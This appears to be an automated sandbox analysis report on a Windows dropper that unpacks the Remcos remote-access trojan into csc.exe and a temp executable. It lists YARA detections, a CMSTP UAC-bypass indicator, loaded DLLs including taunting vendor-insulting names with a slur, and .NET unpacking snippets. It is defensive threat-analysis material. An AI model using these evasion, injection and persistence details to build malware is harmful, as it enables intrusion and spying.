                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, CentralIterator.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, DetachedCalc.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, DetachedCalc.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, cGOENDByihghaE21MG5.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, UuINIkdXDBG5e46ex3q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, hIKm5xdfOG6UqF42bjx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 3.2.csc.exe.9fb0000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@6/5@5/4
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00411010 GetLastError,FormatMessageA,LocalFree,0_2_00411010
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413845 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,GetLastError,FormatMessageA,LocalFree,0_2_00413845
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040F650 GetModuleHandleA,GetProcAddress,SetLastError,SetLastError,SetLastError,GetDiskFreeSpaceA,0_2_0040F650
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040F900 CoInitialize,CoCreateInstance,MultiByteToWideChar,0_2_0040F900
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004013D0 LoadResource,LockResource,SizeofResource,0_2_004013D0
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile created: C:\Users\user\Videos\ElectronArtsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yjfesx.exeJump to behavior
                      Source: Yara matchFile source: 5.2.yjfesx.exe.13590000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.csc.exe.840bf08.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.csc.exe.83c60e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.csc.exe.8433f28.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.2506800758.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2829283806.0000000013590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: 3XSXmrEOw7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 3XSXmrEOw7.exeReversingLabs: Detection: 28%
                      Source: 3XSXmrEOw7.exeString found in binary or memory: &Non-Installation typique - Rpertoire par dfaut *Installation avance - Choix du rpertoireInternet Explorer %s est actuellemen
                      Source: 3XSXmrEOw7.exeString found in binary or memory: &Non-Installation typique - R
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile read: C:\Users\user\Desktop\3XSXmrEOw7.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\3XSXmrEOw7.exe "C:\Users\user\Desktop\3XSXmrEOw7.exe"
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\yjfesx.exe C:\Users\user\AppData\Local\Temp\yjfesx.exe
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeProcess created: C:\Users\user\AppData\Local\Temp\yjfesx.exe "C:\Users\user\AppData\Local\Temp\yjfesx.exe"
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeProcess created: C:\Users\user\AppData\Local\Temp\yjfesx.exe "C:\Users\user\AppData\Local\Temp\yjfesx.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: icmp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: 3XSXmrEOw7.exeStatic file information: File size 2605056 > 1048576
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_CURSOR
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_BITMAP
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_ICON
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_MENU
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_DIALOG
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_STRING
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_ACCELERATOR
                      Source: 3XSXmrEOw7.exeStatic PE information: section name: RT_GROUP_ICON
                      Source: 3XSXmrEOw7.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x224000
                      Source: 3XSXmrEOw7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Swvvzalx.pdb source: csc.exe, csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000080AD000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994615289.0000000009700000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3995314411.0000000009FB0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3995314411.0000000009FB0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000708E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: c:\installer\incremental installer7\dev\AutoRun7\Release\autorun7.pdb source: 3XSXmrEOw7.exe, ElectronArtsCLI.exe.0.dr
                      Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeUnpacked PE file: 0.2.3XSXmrEOw7.exe.2420000.2.unpack
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, DetachedCalc.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, cGOENDByihghaE21MG5.cs.Net Code: Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777250)),Type.GetTypeFromHandle(XveeF7XAyEDpVRQtyQ3.pedaXVSaEJ(16777305))})
                      .NET source code contains potential unpacker
                      Source: 0.2.3XSXmrEOw7.exe.880000.1.raw.unpack, CentralIterator.cs.Net Code: MatchIterator System.Reflection.Assembly.Load(byte[])
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.cs.Net Code: FaQgOk6ZkC
                      Source: 3.2.csc.exe.9700000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.cs.Net Code: vl0W5T2oSe
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 3.3.csc.exe.8433f28.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 3.3.csc.exe.83c60e8.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
